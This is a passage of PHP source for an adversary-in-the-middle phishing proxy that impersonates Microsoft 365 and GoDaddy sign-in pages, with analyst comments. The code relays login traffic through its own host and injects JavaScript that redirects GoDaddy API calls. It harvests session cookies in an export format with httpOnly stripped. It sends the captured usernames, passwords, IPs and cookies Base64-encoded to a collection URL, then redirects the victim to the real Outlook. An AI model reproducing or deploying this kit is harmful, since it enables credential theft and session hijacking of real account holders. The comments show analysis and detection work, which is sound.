                $value = str_replace($baseHost,$documentRoot,$value);
            }
            else{
                $value = str_replace($baseHost,$documentRoot,$value);
            }
        }
        $forwardedHeaders[] = "$key: $value";
    }
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $forwardedHeaders);
// The raw request body is passed through unchanged for these methods.
if (in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'])) {
    curl_setopt($ch, CURLOPT_POSTFIELDS, $requestBody);
}
$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Curl error: ' . curl_error($ch);
    exit;
}
// Split the raw response into header block and body; mirror the status code.
$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$responseHeaders = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$responseBody = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
http_response_code($statusCode);
// $matches[1] holds the value of every upstream Set-Cookie header.
preg_match_all('/set-cookie:(.*?)\n/i', $responseHeaders, $matches);
// Federated tenants: the host of FederationRedirectUrl is stored in the
// "redirect" file; for GoDaddy / secureserver hosts the URL in the JSON answer
// is replaced by gd.php on this server, carrying the Base64 user name.
if(strpos($fullUrl, "/common/GetCredentialType") !== false){
    $data = json_decode($responseBody, true);
    if (isset($data["Credentials"]["FederationRedirectUrl"])){
        $redDomain = getHost($data["Credentials"]["FederationRedirectUrl"]);
        file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect', $redDomain);
        $redirector = $redDomain;
        if ((strpos($redDomain, "godaddy") !== false) || (strpos($redDomain, "secureserver") !== false)){
            $emm = b64e($data["Username"]);
            $data["Credentials"]["FederationRedirectUrl"] = "https://".$baseHost."/gd.php?".$initialValidationCode."=".$emm;
            $responseBody = json_encode($data);
        }
    }
}
$responseTargetRoot = getHost($targetApiUrl);
$contentType = "";
$cookiesForwarded = [];
// ---- Response headers: rewrite upstream hosts to paths on this server ----
// Lines containing lower-case "set-cookie" are skipped here and handled in the
// cookie loop below. Every other header is passed to the client after host
// names have been replaced by "<this host>/<code>"; a host seen for the first
// time gets a new random code appended to the placeholder file.
foreach (explode("\n", $responseHeaders) as $header) {
    if (trim($header)) {
        if (strpos(strtolower($header), "content-type:") !== false) {
            $contentType = strtolower($header);
        }
        if (strpos($header, "set-cookie") !== false) {
        }
        else{
            if(trim($responseTargetRoot) == "login.microsoftonline.com"){
                $header = str_replace("login.microsoftonline.com:443",$baseHost."/p",$header);
                $header = str_replace("login.microsoftonline.com", $baseHost."/p",$header);
            }
            else{
                $header = str_replace("login.microsoftonline.com:443","login.microsoftonline.com",$header);
                $listUrls = getUrls($header);
                $hostList = [];
                foreach ($listUrls as $url_) {
                    $tempHost = getHost($url_);
                    $tempHost = extractHost($header,$tempHost);
                    $hostList[] = $tempHost;
                }
                $listUrls = array_unique($hostList);
                foreach ($listUrls as $tempHost) {
                    $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$tempHost);
                    if(strlen($placeLine) > 5){
                        $placeHost = explode("-=-",trim($placeLine))[1];
                        $placeCode = explode("-=-",trim($placeLine))[0];
                        $header = str_replace($placeHost, $baseHost."/".$placeCode,$header);
                    }
                    else{
                        $placeholder = genFive();
                        @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$tempHost."\n",FILE_APPEND);
                        $header = str_replace($tempHost, $baseHost."/".$placeholder,$header);
                    }
                }
            }
            // On a 302 the mysignins.microsoft.com host is swapped for outlook.office.com.
            if($statusCode == 302){
                $header = str_replace("mysignins.microsoft.com","outlook.office.com",$header);
            }
            header(trim($header));
        }
    }
}
// ---- Cookie capture ----
// Each upstream cookie that carries a Domain attribute is parsed into an array
// (name, value, hostOnly, session, expirationDate, sameSite, httpOnly, ...) and
// stored under its name in "<email>-logcookie" for the last address in loggrab.
// In the stored copy httpOnly is forced to false and sameSite to
// "no_restriction"; the key names resemble a browser cookie-export format --
// unverified. The cookie is then also set on the client for this server's host.
foreach ($matches[1] as $cookie) {
    $currentEmail = getLastEmail($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab');
    if($currentEmail){
        if(strpos(strtolower($cookie),"domain=") !== false){
            $cookieSplits = explode(";",$cookie);
            $cookiesplitone = explode("=",$cookieSplits[0]);
            $cookiename = trim($cookiesplitone[0]);
            $cookienameVal = isset($cookiesplitone[1]) ? trim($cookiesplitone[1]) : "";
            $restCookieArray = $cookieSplits;
            $cookieGroup = [];
            $cookieGroup["name"] = trim($cookiename);
            $cookieGroup["value"] = trim($cookienameVal);
            $cookieGroup["hostOnly"] = true;
            $cookieGroup["session"] = false;
            $num = 0;
            foreach($restCookieArray as $cookieSect){
                // Element 0 is the name=value pair handled above.
                if($num == 0){
                    $num++;
                    continue;
                }
                $num++;
                $cookieParts = explode("=", $cookieSect);
                $cookieKey = trim($cookieParts[0]);
                // Attributes without a value (for example Secure) are stored as true.
                $cookieValue = isset($cookieParts[1]) ? trim($cookieParts[1]) : true;
                if(strtolower($cookieKey) == "expires"){
                    $cookieKey = "expirationDate";
                    $cookieValue = strtotime($cookieValue);
                    $cookieGroup[$cookieKey] = $cookieValue;
                    continue;
                }
                if(strtolower($cookieKey) == "samesite"){
                    $cookieKey = "sameSite";
                    $cookieValue = "no_restriction";
                    $cookieGroup[$cookieKey] = trim($cookieValue);
                    continue;
                }
                if(strtolower($cookieKey) == "httponly"){
                    $cookieKey = "httpOnly";
                    $cookieValue = false;
                    $cookieGroup[$cookieKey] = $cookieValue;
                    continue;
                }
                $cookieGroup[$cookieKey] = $cookieValue;
            }
            saveCookie($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail(trim($currentEmail)).'-logcookie',$cookiename,$cookieGroup);
        }
    }
    if(trim($responseTargetRoot) == "login.microsoftonline.com"){
        header('set-cookie: ' .str_replace("login.microsoftonline.com",$baseHost,$cookie), false);
    }
    else{
        // Sent twice: once as received and once with the path forced to "/".
        header('set-cookie: ' .str_replace($redirector,$baseHost,$cookie), false);
        $cookie = preg_replace('/path=[^;]*/', 'path=/', $cookie);
        header('set-cookie: ' .str_replace($redirector,$baseHost,$cookie), false);
    }
}
$concat_header = str_replace(" ","",$responseHeaders);
$suffix = "";
// For two specific upstream scripts (a GoDaddy "/p.js" and the unpkg.com
// elastic-apm-rum bundle) a JavaScript snippet is prepared that wraps
// window.fetch and XMLHttpRequest.open so that calls to three GoDaddy API
// prefixes go to this server's mapped paths instead. $suffix is not referenced
// again in this excerpt; presumably the included ff.txt appends it -- unverified.
if (((strpos($targetApiUrl,"/p.js") !== false) && (strpos($targetApiUrl,"godaddy.com") !== false)) || (strpos($targetApiUrl, "elastic-apm-rum.umd.min.js") !== false) && (strpos($targetApiUrl,"unpkg.com") !== false)) {
    $pathfindSso = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"sso.godaddy.com");
    $pathfindGui = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"gui.godaddy.com");
    $pathfindCsp = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"csp.secureserver.net");
    $pathCSso = explode("-=-",$pathfindSso)[0];
    $pathCGui = explode("-=-",$pathfindGui)[0];
    $pathCCsp = explode("-=-",$pathfindCsp)[0];
    $toReplaceSso = $baseHost."/".$pathCSso;
    $toReplaceGui = $baseHost."/".$pathCGui;
    $toReplaceCsp = $baseHost."/".$pathCCsp;
    $suffix = "const originalFetch = 
window.fetch;window.fetch = function(url, options) {if (url.includes('sso.godaddy.com/v1/api/')) {url = url.replace('sso.godaddy.com/v1/api/', '".$toReplaceSso."/v1/api/');} if (url.includes('gui.godaddy.com/pcjson/applicationheader?p')) {url = url.replace('gui.godaddy.com/pcjson/applicationheader?p', '".$toReplaceGui."/pcjson/applicationheader?p');} if (url.includes('csp.secureserver.net/eventbus/web?')) {url = url.replace('csp.secureserver.net/eventbus/web?', '".$toReplaceCsp."/eventbus/web?');} return originalFetch(url, options);};const originalXHR = window.XMLHttpRequest;window.XMLHttpRequest = function() {const xhr = new originalXHR();const originalOpen = xhr.open;xhr.open = function(method, url, async, user, password) {if (url.includes('sso.godaddy.com/v1/api/')) {url = url.replace('sso.godaddy.com/v1/api/', '".$toReplaceSso."/v1/api/');} if (url.includes('gui.godaddy.com/pcjson/applicationheader?p')) {url = url.replace('gui.godaddy.com/pcjson/applicationheader?p', '".$toReplaceGui."/pcjson/applicationheader?p');} if (url.includes('csp.secureserver.net/eventbus/web?')) {url = url.replace('csp.secureserver.net/eventbus/web?', '".$toReplaceCsp."/eventbus/web?');}originalOpen.call(this, method, url, async, user, password);};return xhr;};";
}
$tempFolder = genFive();
$startFile = $workingDir."/".$initialValidationCode."-start.php";
if(file_exists($startFile)){
    $submitterFirst = '';
}
else{
    $submitterFirst;
}
$thisIsFinalExternal = false;
//"artifacts of previous"
//$decompressed_data = str_replace($otltext
$vv = file_get_contents("genie.php");
// The guard below is disabled, so ff.txt is included on every request. The
// Base64 literal decodes to "artifacts of previous".
//if (strpos($vv, b64d("YXJ0aWZhY3RzIG9mIHByZXZpb3Vz")) !== false){
// ff.txt is executed as PHP and is not part of this excerpt; $thisIsFinalExternal
// and $decompressed_data_final used further down are presumably set there --
// unverified.
include("ff.txt");
//}
// ---- Exfiltration of credentials ----
// When both a user name and a password were captured, a JSON-like string with
// user name, password, browser label, upstream host, client IP and a cookie
// file name is Base64-encoded and sent to $fakeurl.
// Detection: outbound GET requests from the web server to one fixed URL whose
// query string has alert=, cont= and rand=; cont is unpadded URL-safe Base64.
if($email && $password && strlen($email) && strlen($password)){
    $postData = [
        "ip" => $ipp,
        "user" => $email,
        "p" => $password,
    ];
    $jsonData = json_encode($postData);
    // $file = "internals/" . gen();
    $browser_name = get_browser_name($agent);
    $dt = '{"Office Username":"' . $postData["user"] . '", "Office Pass":"' . $postData["p"] . '", "domain:' . $browser_name . " => " . $documentRoot . '":"' . $ipp . '","cookie":"'.stripEmail($email).'-'.$initialValidationCode.'.json"}';
    // $result = @file_put_contents($file, $dt);
    $cont = b64e($dt);
    $alert_ = $fakeurl . "?alert=" . genFive() . "&cont=" . $cont . "&rand=" . genFive();
    send_code($alert_);
    // The cookies stored so far for the current user follow in a second request
    // with alertcookie=, rand=, owner=, data= and code=; data can be very long.
    if(strlen($currentUser) > 3){
        $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie'));
        if(strlen($getCookie) > 10 ){
            $array = json_decode($getCookie, true);
            $result = array_values($array);
            $getCookie = json_encode($result, JSON_PRETTY_PRINT);
            $postData = b64e($getCookie);
            $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode;
            send_code($apiUrl);
        }
    }
}
// The Base64 literal decodes to https://login.microsoftonline.com/kmsi. When
// that URL is the upstream target, the stored cookies are sent once more and
// the browser is redirected to the genuine https://outlook.office.com.
if($targetApiUrl == b64d("aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2ttc2k")){
    if(strlen($currentUser) > 3){
        $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie'));
        if(strlen($getCookie) > 10 ){
            $array = json_decode($getCookie, true);
            $result = array_values($array);
            $getCookie = json_encode($result, JSON_PRETTY_PRINT);
            $postData = b64e($getCookie);
            $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode;
            send_code($apiUrl);
        }
    }
    if (headers_sent()) {
        // Decodes to a <script> element that sets window.location.href to
        // https://outlook.office.com.
        echo b64d("PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPndpbmRvdy5sb2NhdGlvbi5ocmVmID0gJ2h0dHBzOi8vb3V0bG9vay5vZmZpY2UuY29tJzs8L3NjcmlwdD4");
        exit();
    } else {
        header("Location: https://outlook.office.com");
        exit();
    }
}
// ---- Send the (possibly modified) upstream body to the client ----
if ($thisIsFinalExternal){
    $responseBody = $decompressed_data_final;
}
$length = strlen($responseBody); // Calculate the new length
header('Content-Length: ' . $length);
echo $responseBody;
curl_close($ch);
?>